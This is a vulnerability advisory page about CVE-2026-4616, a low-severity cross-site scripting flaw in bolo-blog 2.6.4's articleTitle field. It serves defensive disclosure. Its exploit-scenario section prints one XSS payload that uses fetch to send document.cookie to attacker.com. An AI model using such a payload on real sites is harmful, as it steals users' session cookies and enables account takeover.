Skip to main content

Bolo Blog CVE-2026-4616

| EUVD-2026-14672 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-03-24 VulDB GHSA-cvg8-pgv5-2vg3
XSS Bolo Blog
1.9
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
1.9 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
P
Scope
X

Lifecycle Timeline

6
Severity Changed
Apr 29, 2026 - 01:11 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:11 NVD
4.8 (MEDIUM) 1.9 (LOW)
PoC Detected
Mar 27, 2026 - 23:17 vuln.today
Public exploit code
EUVD ID Assigned
Mar 24, 2026 - 00:45 euvd
EUVD-2026-14672
Analysis Generated
Mar 24, 2026 - 00:45 vuln.today
CVE Published
Mar 24, 2026 - 00:16 nvd
MEDIUM 4.8

DescriptionCVE.org

A security flaw has been discovered in bolo-blog 까지 2.6.4. The affected element is an unknown function of the file /console/article/ of the component Article Title Handler. Performing a manipulation of the argument articleTitle results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

A cross-site scripting (XSS) vulnerability exists in bolo-blog version 2.6.4 in the Article Title Handler component at /console/article/, where the articleTitle parameter is not properly sanitized before being rendered. An authenticated attacker with high privileges can inject malicious JavaScript through the articleTitle argument, resulting in stored or reflected XSS that compromises the integrity of the application. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment This vulnerability presents a low-to-moderate real-world risk despite its public exploit availability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated administrator (or attacker who has compromised administrative credentials) navigates to the article editing interface at /console/article/ and injects malicious JavaScript into the articleTitle field, such as '<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">'. When the page is rendered or when another user views the article list, the browser executes the injected script, potentially exfiltrating session cookies or performing actions on behalf of the victim user. …
Remediation The primary remediation is to upgrade bolo-blog to a patched version released by the maintainers; contact the bolo-blog project at https://github.com/bolo-blog/bolo-solo/issues/330 for patch availability and expected release timeline, as the vendor has not yet formally responded. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-4616 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy